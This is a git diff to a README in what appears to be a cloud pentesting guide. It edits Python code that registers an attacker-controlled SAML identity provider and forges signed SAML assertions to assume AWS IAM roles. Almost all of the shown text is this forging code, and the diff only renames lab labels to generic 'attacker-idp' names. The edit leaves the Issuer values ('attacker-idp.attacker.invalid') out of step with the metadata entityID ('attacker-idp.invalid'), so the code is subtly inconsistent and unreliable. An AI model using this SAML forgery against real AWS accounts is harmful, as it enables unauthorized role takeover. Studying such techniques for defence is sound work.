Update README.md

src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc/README.md

@@ -384,7 +384,7 @@ def _openssl_make_key_and_cert(tmpdir: str) -> tuple[str, str]:
             "3650",
             "-nodes",
             "-subj",
-            "/CN=iam-lab-7-attacker",
+            "/CN=attacker-idp",
         ]
     )
     return key_path, cert_path
@@ -402,7 +402,7 @@ def _pem_cert_to_b64(cert_pem: str) -> str:
 
 def make_metadata_xml(cert_b64: str) -> str:
     return f"""<?xml version="1.0"?>
-<EntityDescriptor xmlns="urn:oasis:names:tc:SAML:2.0:metadata" entityID="https://iam-lab-7.attacker.invalid/idp">
+<EntityDescriptor xmlns="urn:oasis:names:tc:SAML:2.0:metadata" entityID="https://attacker-idp.invalid/idp">
   <IDPSSODescriptor protocolSupportEnumeration="urn:oasis:names:tc:SAML:2.0:protocol">
     <KeyDescriptor use="signing">
       <KeyInfo xmlns="http://www.w3.org/2000/09/xmldsig#">
@@ -411,7 +411,7 @@ def make_metadata_xml(cert_b64: str) -> str:
         </X509Data>
       </KeyInfo>
     </KeyDescriptor>
-    <SingleSignOnService Binding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-Redirect" Location="https://iam-lab-7.attacker.invalid/sso"/>
+    <SingleSignOnService Binding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-Redirect" Location="https://attacker-idp.invalid/sso"/>
   </IDPSSODescriptor>
 </EntityDescriptor>
 """
@@ -437,7 +437,7 @@ def make_signed_saml_response(role_arn: str, principal_arn: str, key_pem: str, c
     response.set("Destination", "https://signin.aws.amazon.com/saml")
 
     issuer = etree.SubElement(response, etree.QName(ns["saml2"], "Issuer"))
-    issuer.text = "https://iam-lab-7.attacker.invalid/idp"
+    issuer.text = "https://attacker-idp.attacker.invalid/idp"
 
     status = etree.SubElement(response, etree.QName(ns["saml2p"], "Status"))
     status_code = etree.SubElement(status, etree.QName(ns["saml2p"], "StatusCode"))
@@ -449,7 +449,7 @@ def make_signed_saml_response(role_arn: str, principal_arn: str, key_pem: str, c
     assertion.set("IssueInstant", issue_instant.isoformat())
 
     a_issuer = etree.SubElement(assertion, etree.QName(ns["saml2"], "Issuer"))
-    a_issuer.text = "https://iam-lab-7.attacker.invalid/idp"
+    a_issuer.text = "https://attacker-idp.attacker.invalid/idp"
 
     subject = etree.SubElement(assertion, etree.QName(ns["saml2"], "Subject"))
     name_id = etree.SubElement(subject, etree.QName(ns["saml2"], "NameID"))
@@ -488,7 +488,7 @@ def make_signed_saml_response(role_arn: str, principal_arn: str, key_pem: str, c
     attr_session = etree.SubElement(attribute_statement, etree.QName(ns["saml2"], "Attribute"))
     attr_session.set("Name", "https://aws.amazon.com/SAML/Attributes/RoleSessionName")
     attr_session_value = etree.SubElement(attr_session, etree.QName(ns["saml2"], "AttributeValue"))
-    attr_session_value.text = "iam-lab-7-session"
+    attr_session_value.text = "attacker-idp"
 
     with open(key_pem, "rb") as f:
         key_bytes = f.read()